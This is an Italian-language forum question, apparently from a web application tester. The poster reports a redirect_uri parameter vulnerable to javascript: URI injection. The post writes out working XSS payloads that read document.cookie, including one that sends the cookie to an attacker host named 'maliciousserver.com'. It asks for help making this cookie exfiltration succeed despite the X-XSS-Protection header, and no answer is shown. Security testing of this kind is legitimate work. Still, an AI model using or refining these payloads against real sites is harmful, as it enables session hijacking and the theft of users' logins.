Sto testando un'applicazione web e ho scoperto che url contiene "redirect=" dove naviga in una nuova posizione una volta effettuato l'accesso.
http://IPAddress/?redirect_uri=test
Sto cercando di sfruttare il cookie usando redirect_uri come HTTPOnly & I flag di sicurezza non sono impostati.
Ho provato diversi payload e sfruttato con successo utilizzando il seguente payload
http://IPAddress/?redirect_uri=javascript:alert(document.cookie)
Ora voglio trasferire il carico utile su un altro server malevolo, per questo ho provato a seguire i payload, ma niente funziona.
http://IPAddress/?redirect_uri=javascript:document.location.href="http://maliciousserver.com/anyfile.php?cookie=" + document.cookie
Il payload precedente non ha nemmeno inviato richieste al server malevolo, mentre la richiesta HTTP è stata ricevuta per il seguente payload
http://IPAddress/?redirect_uri=javascript:document.location.href="http://maliciousserver.com/anyfile.php?cookie="
Qualcuno potrebbe aiutarmi a trasferire il cookie utilizzando redirect_uri=javascript: di carico utile su un altro server?
P.S - I tag <script> </script> non vengono eseguiti poiché l'intestazione di protezione x-xss è abilitata.